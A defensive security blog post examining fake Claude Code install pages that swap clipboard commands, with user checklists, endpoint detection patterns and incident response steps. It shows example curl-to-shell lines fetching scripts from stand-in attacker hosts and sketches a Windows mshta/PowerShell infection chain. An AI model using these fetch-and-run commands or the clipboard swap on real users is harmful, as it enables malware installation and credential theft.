Nikolay Kuziev

Fake AI Installers: When "Installing Claude" Turns Into Running Malware

A practical security case study about fake AI tool install pages, clipboard command substitution, and why copy-pasting terminal commands from search results has become a real workstation risk.

Introduction

This is not a Claude vulnerability.

It is not a story about "AI tools are dangerous" either.

It is about a much more ordinary problem:

developers are used to copying install commands from the browser into the terminal

Attackers are now abusing that habit.

The old phishing pattern was familiar: a fake login page, a malicious attachment, a suspicious document, a password reset email.

The newer developer-focused pattern looks different:

fake documentation
fake install page
fake copy button
malware instead of install.sh

The victim does not need to open a suspicious attachment.

They search for an AI development tool, click a sponsored result, land on a page that looks like documentation, copy a terminal command, and run it.

It feels like installing a normal CLI tool.

But it can be the start of a malware infection chain.

The attack pattern: InstallFix

Push Security described this pattern as InstallFix.

The idea is simple:

  1. An attacker clones an installation page for a popular developer tool.
  2. The page looks close enough to legitimate documentation.
  3. The install commands are modified.
  4. Traffic is driven through Google Ads or other malvertising channels.
  5. The user copies and runs the command manually.
  6. The "installer" executes attacker-controlled code.

This is related to ClickFix, but the pretext is different.

In ClickFix, the user is often tricked into "fixing" something: a CAPTCHA, a browser issue, a broken access flow, or a fake system error.

In InstallFix, nothing is broken.

The user already wants to install legitimate software.

That is what makes the attack so effective.

Why AI tools are a good lure

AI developer tooling is moving fast.

People are installing Claude Code, ChatGPT-related tools, Cursor extensions, MCP servers, local agents, CLI wrappers, browser extensions, desktop clients, and small automation packages around LLM workflows.

In many teams, this does not go through any formal internal approval process.

The real workflow often looks like this:

a colleague mentions a tool
someone searches for the install guide
the first result looks right
they copy the command
they run it

For an attacker, this is almost perfect:

  • the tool is popular and timely;
  • users expect to see terminal commands;
  • sponsored results can appear above organic results;
  • documentation pages are easy to imitate;
  • the install command can look normal;
  • the user may be redirected to a real page afterward and notice nothing.

Kaspersky and Push Security have both described campaigns where fake install pages were promoted through search ads and imitated installation instructions for Claude Code or similar AI tooling.

The important point is this:

the lure is not the AI model itself
the lure is the developer installation workflow

A realistic case: installing Claude through install.sh

Imagine a developer wants to install an AI coding assistant.

They search for:

Claude Code install

At the top of the search results, they see a sponsored link.

The domain looks plausible:

claude-code-docs.example
claude-code-install.example
claude-update.example

The page looks like documentation:

  • logo;
  • sidebar;
  • quickstart section;
  • OS tabs for macOS, Linux, and Windows;
  • a copy button;
  • a short terminal command.

On the page, the visible command may look like this:

curl -fsSL https://claude.ai/install.sh | sh

But the visible command and the clipboard command do not have to be the same.

For example, the page can display:

curl -fsSL https://claude.ai/install.sh | sh

But after the user clicks Copy, the clipboard may contain:

curl -fsSL https://download.example.invalid/install.sh | sh

Or:

curl -fsSL https://download.example.invalid/bootstrap | sh

In a real campaign, the attacker domain would be more convincing.

The point is not the exact URL.

The point is that the user trusts the page UI instead of verifying the pasted command before pressing Enter.

Where JavaScript comes in

Most documentation pages show a command as text and provide a Copy button.

That button can copy a value that is different from the text the user sees.

Conceptually:

visible text:
  curl -fsSL https://official.example/install.sh | sh

clipboard value:
  curl -fsSL https://attacker.example/install.sh | sh

An attacker can make this more subtle:

  • show a legitimate-looking domain in the page;
  • copy an attacker-controlled URL into the clipboard;
  • add base64 decoding;
  • add silent flags;
  • choose payloads based on OS;
  • change the command only for selected geographies or organizations;
  • change the copied command only when the visit comes from an ad campaign.

So "I saw the correct command on the page" is not enough.

The only thing that matters is what is actually pasted into the terminal.

That sounds basic.

But this is exactly the kind of basic thing that breaks under speed and trust.
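
A cheap habit that helps: look at the clipboard somewhere inert before the terminal. A minimal sketch, assuming macOS (pbpaste ships with the OS) or a Linux desktop with xclip or wl-clipboard installed:

# macOS: print the clipboard contents without executing them
pbpaste

# Linux (X11), requires xclip
xclip -selection clipboard -o

# Linux (Wayland), requires wl-clipboard
wl-paste

Pasting into a plain text editor first achieves the same thing. The point is that the copied command gets read before it gets executed.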

Windows scenario: mshta and PowerShell

On Windows, these campaigns often use living-off-the-land binaries.

A simplified infection chain can look like this:

browser / user paste
  -> PowerShell
  -> mshta.exe
  -> remote HTA or script
  -> cmd.exe or PowerShell stager
  -> fileless payload
  -> persistence or credential theft

In campaigns around fake Claude Code installers, researchers observed patterns involving mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft, and infostealer behavior.

The key point is that the victim does not need to download and double-click a suspicious setup.exe.

They can run one copied command, and that command can fetch the rest.

From a detection perspective, this may look less like "a malicious file from email" and more like user-driven terminal activity.

That is why behavior matters.

macOS and Linux scenario: curl-to-shell

On macOS and Linux, the familiar pattern is:

curl -fsSL https://example.com/install.sh | sh

or:

curl -fsSL https://example.com/install.sh | zsh

This is convenient.

That is exactly why it is dangerous.

The command means:

download a remote script and execute it immediately

If the domain is official and the script is expected, this is a common developer workflow.

If the domain is replaced, this becomes remote code execution performed by the user.

The problem is not curl.

The problem is that the trust boundary becomes:

I trust this web page and its copy button

That is a weak boundary.

Why sponsored search results make this worse

Many users still treat Google Ads as a sign of legitimacy.

The mental shortcut is:

if it is at the top of Google, it is probably fine

That is a dangerous shortcut.

Malvertising works because the user initiates the search. There is no phishing email. No strange attachment. No random message from a stranger.

The user wanted to install the tool.

So they are less suspicious.

This is especially risky in a corporate environment.

A developer workstation may contain:

  • source code;
  • SSH keys;
  • browser sessions;
  • password manager sessions;
  • Git credentials;
  • cloud CLI tokens;
  • kubeconfig files;
  • CI/CD access;
  • internal documentation;
  • VPN access.

An infostealer on that machine is not just "one infected laptop".

It can become an entry point into the organization.

How this differs from a classic fake installer

A classic fake installer looks like this:

download setup.exe
run installer
get malware

InstallFix is more subtle.

It abuses a normal developer habit:

documentation says copy this command
I copy the command
I run the command

For a developer, this does not feel like running a random executable.

It feels like installing a CLI tool from documentation.

That is why security awareness should not stop at:

do not open suspicious executables

It also needs to say:

terminal commands copied from the browser are code execution

What to check before running install commands

A practical checklist for users:

  1. Do not use sponsored results to install developer tools.
  2. Open official documentation from a known source.
  3. Check the domain inside the command, not only the browser address bar.
  4. After pasting, read the command before pressing Enter.
  5. Avoid curl | sh when you do not understand what will be downloaded.
  6. When possible, download the script first and inspect it (a checksum variant is sketched after this list):
curl -fsSL https://official.example/install.sh -o install.sh
less install.sh
sh install.sh
  7. Use a disposable VM or container for tools you do not trust yet.
  8. Do not test new AI tools on a workstation that holds production secrets.
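
For step 6, if the vendor or your internal installation guide publishes a checksum, verifying it costs almost nothing. A minimal sketch; the URL and the recorded hash are placeholders, not real values:

# download without executing
curl -fsSL https://official.example/install.sh -o install.sh

# compute the SHA-256 and compare it with the value recorded in the internal guide
shasum -a 256 install.sh      # macOS
sha256sum install.sh          # most Linux distributions

# run only after the hash and the script contents check out
sh install.sh

This does not help when no trustworthy hash exists, but it catches a swapped download when one does.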

This is not about paranoia.

It is about treating remote installation commands as code execution.

Because that is what they are.

What teams can do

Awareness alone is not enough.

I would add a few practical controls.

Maintain an approved tool list

Teams should know where approved developer tools come from.

Example:

Claude Code:
  official docs: https://docs.anthropic.com/...
  expected package: @anthropic-ai/claude-code

Node.js:
  official site: https://nodejs.org/
  internal mirror: https://nexus.example.com/...

Homebrew:
  official site: https://brew.sh/

If someone finds an installation guide through a sponsored ad, that should be a reason to stop.

Provide internal installation docs

For common tools, internal documentation helps a lot.

It should answer:

  • how to install the tool;
  • which command is approved;
  • which domain is expected;
  • whether a hash or signature should be checked;
  • where to ask for help if the install fails.

This matters especially for AI tools.

People will try them anyway.

If the company does not provide a safe path, employees will find an unsafe path.

Use DNS and web controls

Useful controls include blocking or flagging:

  • newly registered domains;
  • suspicious lookalike domains;
  • known malicious domains;
  • ad-delivered installer pages;
  • direct access to suspicious payload hosts.

This will not stop every campaign.

Attackers rotate infrastructure quickly.

But it is still a useful layer.

Endpoint detections

On Windows, I would monitor for patterns such as:

browser -> powershell
browser -> cmd
powershell -> mshta
mshta -> cmd
mshta -> powershell
PowerShell with encoded commands
PowerShell AMSI tampering
new scheduled task near install activity
unexpected outbound traffic from scripting hosts

On macOS and Linux:

shell spawned from browser-adjacent activity
curl or wget downloading scripts to /tmp
chmod +x on a fresh download
execution from /tmp
unexpected launch agents
unexpected shell profile modification
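
For a quick manual look at a single macOS or Linux machine, the locations in the list above can be checked with standard commands. A rough triage sketch; the paths are common defaults and will vary by environment:

# executable files created or modified under /tmp in the last 24 hours
find /tmp/ -type f -perm -u+x -mmin -1440 2>/dev/null

# launch agents and daemons (macOS)
ls -la ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons 2>/dev/null

# recent modification times on shell profiles
ls -la ~/.zshrc ~/.bashrc ~/.bash_profile ~/.profile 2>/dev/null

This is triage, not detection, and it does not replace EDR telemetry; it just covers the common staging and persistence spots named above.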

Context matters.

curl is not malware.

PowerShell is not malware.

But a browser-driven install flow, a suspicious domain, an obfuscated command, and persistence behavior together are a different story.

Why AppSec and DevSecOps should care

At first glance, this looks like endpoint security and awareness.

But it matters for AppSec and DevSecOps too.

Developer workstations often have access to the software supply chain:

  • Git repositories;
  • package registries;
  • container registries;
  • CI/CD variables;
  • deployment configuration;
  • signing keys;
  • cloud credentials;
  • kubeconfig files.

If an infostealer gets browser sessions or local credentials, the next step can be a supply chain incident.

That is why Secure SDLC should include workstation and tooling hygiene:

  • approved source lists for developer tools;
  • no installation from sponsored results;
  • internal installation guides;
  • sandboxing for new AI tools;
  • endpoint telemetry on developer machines;
  • least-privilege developer tokens;
  • short-lived credentials;
  • separate production credentials;
  • regular review of local secrets and kubeconfigs.

This is not about fighting Claude.

It is about developer workstation security.

Incident response checklist

If someone already ran a suspicious install command:

  1. Stop using the workstation.
  2. Isolate the endpoint from the network or through EDR.
  3. Preserve the command, URL, browser history, and time window.
  4. Review the process tree: browser, shell, PowerShell, mshta.exe, cmd.exe, curl, zsh.
  5. Check persistence: scheduled tasks, launch agents, startup items, shell profiles.
  6. Review outbound connections.
  7. Treat browser sessions and tokens as potentially compromised.
  8. Rotate credentials:
    • Git;
    • GitHub or GitLab;
    • cloud;
    • container registry;
    • package registry;
    • password manager session, if relevant.
  9. Review recent repository and CI/CD activity.
  10. Rebuild the workstation if cleanup confidence is low.

If this is an infostealer, deleting one file is not enough.

Credentials may already be gone.

What this does not solve

Checking install commands does not replace:

  • endpoint protection;
  • DNS filtering;
  • secure web gateways;
  • least privilege;
  • credential rotation;
  • EDR telemetry;
  • software allowlisting;
  • internal package mirrors;
  • developer security training.

It solves one specific gap:

people should not blindly execute code from a page they reached through an ad

That gap is small, but it is real.

Closing

InstallFix is uncomfortable because it does not need a sophisticated exploit.

It abuses normal developer behavior.

We trained people to do this:

copy command from docs
paste into terminal
press Enter

Attackers replaced the docs.

Or the command.

Or the clipboard value.

That can be enough.

So the rule I use is simple:

an install command from the browser is code execution

Treat it like code:

  • verify the source;
  • verify the domain;
  • read the command after pasting;
  • do not trust sponsored results;
  • do not run unknown install.sh scripts on workstations with secrets;
  • provide an approved internal path for popular tools.

This is a small habit.

But it can be the difference between installing a developer tool and running an infostealer on a developer workstation.
